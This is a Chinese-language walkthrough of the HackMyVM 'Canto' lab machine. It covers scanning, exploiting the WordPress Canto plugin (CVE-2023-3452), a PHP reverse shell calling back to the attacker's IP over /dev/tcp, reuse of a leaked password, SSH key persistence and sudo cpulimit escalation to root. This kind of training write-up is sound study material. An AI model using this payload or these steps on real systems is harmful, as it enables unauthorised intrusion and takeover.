Canto - hackmyvm

简介

靶机名称:Canto

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Canto

本地环境

虚拟机:vitual box

靶场IP(Canto):192.168.130.53

windows_IP:192.168.130.158

kali_IP:192.168.130.166

扫描

nmap起手

bash 复制代码
nmap -sT -p0- 192.168.130.53 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
sudo nmap -sT -sV -sC -O -p$ports 192.168.130.53/32 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 05:55 EDT
Nmap scan report for canto.lan (192.168.130.53)
Host is up (0.00084s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)
|_  256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Ubuntu))
|_http-generator: WordPress 6.5.3
|_http-server-header: Apache/2.4.57 (Ubuntu)
|_http-title: Canto
MAC Address: 08:00:27:73:D7:34 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

HTTP

框架是wordpress,直接wpscan先试试

bash 复制代码
wpscan --url http://192.168.130.53/ --plugins-detection aggressive -e u,ap --api-token=Vjt...
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.130.53/ [192.168.130.53]
[+] Started: Thu Aug  1 09:23:25 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.57 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.130.53/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.130.53/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.130.53/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.130.53/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:02 <==========> (702 / 702) 100.00% Time: 00:00:02
[i] The WordPress version could not be detected.

[+] WordPress theme in use: twentytwentyfour
 | Location: http://192.168.130.53/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://192.168.130.53/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | [!] Directory listing is enabled
 | Style URL: http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:01:04 <=====> (106191 / 106191) 100.00% Time: 00:01:04
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.130.53/wp-content/plugins/akismet/
 | Last Updated: 2024-07-10T22:16:00.000Z
 | Readme: http://192.168.130.53/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.3
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt

[+] canto
 | Location: http://192.168.130.53/wp-content/plugins/canto/
 | Last Updated: 2024-07-17T04:18:00.000Z
 | Readme: http://192.168.130.53/wp-content/plugins/canto/readme.txt
 | [!] The version is out of date, the latest version is 3.0.9
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/canto/, status: 200
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF
 |     References:
 |      - https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28976
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28977
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28978
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24063
 |      - https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0
 |
 | [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion
 |     Fixed in: 3.0.5
 |     References:
 |      - https://wpscan.com/vulnerability/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3452
 |
 | [!] Title: Canto < 3.0.7 - Unauthenticated RCE
 |     Fixed in: 3.0.7
 |     References:
 |      - https://wpscan.com/vulnerability/1595af73-6f97-4bc9-9cb2-14a55daaa2d4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25096
 |      - https://patchstack.com/database/vulnerability/canto/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability
 |
 | [!] Title: Canto < 3.0.9 - Unauthenticated Remote File Inclusion
 |     Fixed in: 3.0.9
 |     References:
 |      - https://wpscan.com/vulnerability/3ea53721-bdf6-4203-b6bc-2565d6283159
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4936
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/95a68ae0-36da-499b-a09d-4c91db8aa338
 |
 | Version: 3.0.4 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/canto/readme.txt
 | Confirmed By: Composer File (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/canto/package.json, Match: '3.0.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=============> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] erik
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.130.53/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 21

可以看到canto插件有漏洞,searchsplolit找一下

那就没什么好说的了,直接打poc

CVE-2023-3452

https://github.com/leoanggal1/CVE-2023-3452-PoC

先准备一个反弹shell的php文件

php 复制代码
<?php system("bash -c 'sh -i >& /dev/tcp/192.168.130.166/40000 0>&1'");?> 

然后起个监听

bash 复制代码
 rlwrap -cAr nc -lvvp 40000

最后poc打过去就好了

bash 复制代码
python3 CVE-2023-3452.py -u http://192.168.130.53 -LHOST 192.168.130.166  -s ./shell.php

提权

备份

/var/wordpress/backups路径下找到账密备份文件

www-data@canto:/var/wordpress/backups$ su erik
su erik
Password: th1sIsTheP3ssw0rd!

erik@canto:/var/wordpress/backups$ cd
cd
erik@canto:~$ ls
ls
notes  user.txt
erik@canto:~$ id
id
uid=1001(erik) gid=1001(erik) groups=1001(erik)

提权成功,拿到user.txt

顺手把公钥传上去维权

bash 复制代码
erik@canto:~$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
...
erik@canto:~/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" > authorized_keys

sudo提权

sudo -l查看权限

erik@canto:/$ sudo -l
Matching Defaults entries for erik on canto:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User erik may run the following commands on canto:
    (ALL : ALL) NOPASSWD: /usr/bin/cpulimit

GTFOBINS有一键提权方案

bash 复制代码
erik@canto:/$ sudo /usr/bin/cpulimit -l 100 -f /bin/bash
Process 3024 detected
root@canto:/# cd
root@canto:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canto:~# ls
root.txt  snap

结束

相关推荐
蜜獾云1 分钟前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
小屁不止是运维2 分钟前
麒麟操作系统服务架构保姆级教程(五)NGINX中间件详解
linux·运维·服务器·nginx·中间件·架构
Hacker_Oldv7 分钟前
WPS 认证机制
运维·服务器·wps
bitcsljl16 分钟前
Linux 命令行快捷键
linux·运维·服务器
ac.char19 分钟前
在 Ubuntu 下使用 Tauri 打包 EXE 应用
linux·运维·ubuntu
Cachel wood38 分钟前
python round四舍五入和decimal库精确四舍五入
java·linux·前端·数据库·vue.js·python·前端框架
Youkiup1 小时前
【linux 常用命令】
linux·运维·服务器
qq_297504611 小时前
【解决】Linux更新系统内核后Nvidia-smi has failed...
linux·运维·服务器
虹科数字化与AR1 小时前
安宝特应用 | 美国OSHA扩展Vuzix AR眼镜应用,强化劳动安全与效率
安全·ar·远程协助
weixin_437398211 小时前
Linux扩展——shell编程
linux·运维·服务器·bash